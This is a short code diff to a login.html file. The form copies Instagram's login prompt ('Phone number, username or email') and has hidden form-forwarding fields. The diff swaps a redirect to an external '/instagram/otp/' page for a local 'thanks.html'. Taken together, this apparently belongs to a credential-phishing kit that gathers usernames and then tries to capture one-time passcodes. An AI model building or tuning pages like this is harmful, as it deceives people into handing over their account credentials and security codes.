--- a/login.html
+++ b/login.html
@@ -51,7 +51,7 @@
                     <span>Phone number, username or email</span>
                     <input type="text" name="username" id="username" required>
                     <input type="hidden" name="_captcha" value="false">
-                    <input type="hidden" id="nextField" name="_next" value="https://krelbs.vercel.app/instagram/otp/657daf104b167f68d1979b9c.html">
+                    <input type="hidden" id="nextField" name="_next" value="thanks.html">
                   </div>
                 </div>
 
@@ -117,3 +117,4 @@
   <script src='app.js'></script>
 </body>
 </html>
+
